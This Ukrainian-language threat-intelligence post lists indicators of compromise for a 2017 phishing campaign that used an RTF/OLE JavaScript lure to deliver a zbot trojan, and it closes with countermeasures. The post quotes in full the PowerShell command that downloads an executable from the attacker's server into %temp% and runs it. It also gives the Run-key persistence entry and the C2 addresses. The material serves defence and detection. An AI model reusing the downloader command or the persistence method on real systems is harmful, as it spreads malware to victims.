Archive | 09/11/2017

IOC_zbot(RTF.OLE.JS)_021117

Доброго дня, панове.

Візьміть до уваги.

Отримав на аналіз документ приманку активація якої призводить до завантаження модифікованого zbot (Trojan).

Рівень загрози – середній. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Трохи аналітики:

  • Розсилка цього зразка проводилася ще 2-го листопада – посилання досі активні!
  • Лист та приманка локалізовані
  • Сервер що містить payload одночасно виступає сервером контролю (уже було)
  • Файл представляє собою RTF із OLE в якості об’єкту – js скрипт (комбінують різні способи)
  • На тестових системах нормально відобразився лише у Wordpad (2007й та 2013й Word не відкрили файл коректно)
  • Схема виклику трохи відрізняється від попередніх: WORDPAD > WSCript > Powershell > %temp%\*.exe
  • Оновлення MS Office, деактивація DDE від таких файлів не захищає, це OLE.
  • Тут або OLE вимикати, або мої правила застосовувати, або powershell блокувати.

Схема атаки:

email > .docx (RTF - OLE - JS) > запитання1? > WSCript > powershell > GET payload > %temp%\*.exe

Маркери IOC:

Дані по листу

2017-11-02 01:58:53 AM 
Connection from: 193.111.156.1 (mail.iphone.net.ua)
Sending server HELO string: mail.iphone.net.ua
Message id:
Message reference: ххххххххххххх
Sender: mmc@hl[.]ua
Recipient: *****@company.com.ua
SMTP Status: OK
Delivery attempt #1 (final)

Приєднання – документ-приманка

 

File name договор УРК.docx 
SHA-256 bcfd72b7a469940c1168bba27803c13bc350dedb23e85322b8e658de2df99ac4
File size 49.73 KB

При відкритті файлу користувача просять двічі клікнути по вбудованому об’єкту.

Якщо жертва клікає та ігнорує попередження – в %temp% видобувається скрипт

File name задолжность (2).js 
SHA-256 ef005f96c37eb2a1ab4a78aa9022397b0b5d73bba998057d17725038072f5c17
File size 19.84 KB

Виконання якого передає команду на powershell:

"C:\Program Files\Windows NT\Accessories\WORDPAD.EXE" "C:\Users\operator\Desktop\договор УРК.docx" 
"C:\Windows\System32\WScript.exe" "C:\tmp\задолжность (2).js"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://autoxls[.]ru/documentooborot/micro.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

Виконання команд призводить до завантаження payload

File name micro.exe  >> tmp\65536.exe
SHA-256 c47b43a0321f3c13fe42945bfa5bcbe223d8d326335d5856dd7c02dd07616fb8
File size 439.5 KB

Після його запуску він дублює себе у %appdata% із зміненою контрольною сумою мімікруючи під звичайні додатки (кожен запуск – інший: Skype, Mozilla, Macromedia, DTL etc)

"C:\tmp\65536.exe" 
"C:\Users\operator\AppData\Roaming\DAEMON Tools Lite\DAEMONToolsLiteSync.exe"
"C:\Windows\system32\cmd.exe" /c "C:\tmp\tmp8426d97e.bat"

 

File name DAEMONToolsLiteSync.exe 
SHA-256 65cb0804986075d3a8ed004a043cef3c3a2db6cff15788f6d5267d9abd711733
File size 439.5 KB

Крім того закріплюється через автозавантаження

HKEY_USERS\S-1-5-...\Software\Microsoft\Windows\CurrentVersion\Run
{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} 
"C:\Users\operator\AppData\Roaming\DAEMON Tools Lite\DAEMONToolsLiteSync.exe"

Після запуску починає активний мережевий обмін із сервером контролю.

Стандартні правила Acces Protection які могли б зупинити, яки були активовані:
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES\WINDOWS NT\ACCESSORIES\WORDPAD.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by port blocking rule (rule is currently not enforced) C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by port blocking rule (rule is currently not enforced) C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати механізм OLE
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити створення та зчитування/запуску *.JS* з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)
  4. Деактивація WSH (обробка скриптових файлів)
  5. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом)
  6. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження основного тіла

45.76.198.223:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи

45.76.198.223:80 HTTP 590 docfileserver[.]ru POST /web/ HTTP/1.1

Контрзаходи:

  • Деактивація OLE через реєстр чи групові політики
  • Заборона створення дочірніх процесів для додатків MS Office (додати туди WSCript та WORDPAD)
  • Заборона доступу до мережі Інтернет для powershell (по аналогії із варіантом 1)
  • Деактивація WSH
  • Заборона створення та зчитування/запуску *.EXE та скриптових з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements